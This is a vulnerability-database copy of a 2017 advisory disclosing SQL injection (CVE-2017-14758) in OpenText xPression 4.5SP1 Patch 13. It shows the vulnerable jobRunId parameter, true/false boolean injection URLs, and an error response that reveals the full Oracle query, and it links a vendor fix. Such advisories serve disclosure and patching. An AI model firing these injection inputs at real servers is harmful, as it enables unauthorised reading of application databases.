Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMariusz WoloszynPACKETSTORM:144395
HistorySep 29, 2017 - 12:00 a.m.

OpenText Document Sciences xPression 4.5SP1 Patch 13 SQL Injection

2017-09-2900:00:00
Mariusz Woloszyn
packetstormsecurity.com
27

EPSS

0.002

Percentile

55.6%

JSON
`Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - SQL Injection  
Author: Marcin Woloszyn  
Date: 27. September 2017  
CVE: CVE-2017-14758  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
SQL Injection:  
==============  
  
Due to lack of prepared statements an application is prone to SQL  
Injection attacks.  
Potential attacker can retrieve data from application database by  
exploiting the issue.  
  
Vector :  
--------  
  
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1  
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2  
  
Additionally:  
  
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa  
  
Results in the following error in response:  
  
HTTP/1.1 200 OK  
[...]  
<b>Errors:&nbsp;</b>  
  
See nested exception&#x3b; nested exception is&#x3a;  
java.lang.RuntimeException&#x3a;  
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method  
getJobRunsByIds did not succeed because of a database operation  
failure.&#x3b;  
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;  
Database syntax error &#x3a;SELECT JOBRUN_ID, JOB_NAME,  
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,  
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID  
FROM T_JOBRUN WHERE  
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;  
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;  
ORA-00933&#x3a; SQL command not properly ended  
  
An attacker can see whole query and injection point. This can also be  
used for error-based data extraction.  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`

Related

nvd 1
cvelist 1
zdt 2
exploitdb 1
cve 1
prion 1
exploitpack 1
nvd
nvd
CVE-2017-14758
2017-10-03 01:29:02
cvelist
cvelist
CVE-2017-14758
2017-10-02 17:00:00
zdt
zdt
OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Vulnerability
2017-10-02 00:00:00
OpenText Document Sciences xPression 4.5SP1 Patch 13 SQL Injection Vulnerability
2017-09-30 00:00:00
exploitdb
exploitdb
OpenText Document Sciences xPression 4.5SP1 Patch 13 - &#039;documentId&#039; SQL Injection
2017-10-02 00:00:00
cve
cve
CVE-2017-14758
2017-10-03 01:29:02
prion
prion
Sql injection
2017-10-03 01:29:00
exploitpack
exploitpack
OpenText Document Sciences xPression 4.5SP1 Patch 13 - documentId SQL Injection
2017-10-02 00:00:00

EPSS

0.002

Percentile

55.6%

JSON
Related for PACKETSTORM:144395
nvd1cvelist1zdt2exploitdb1cve1prion1exploitpack1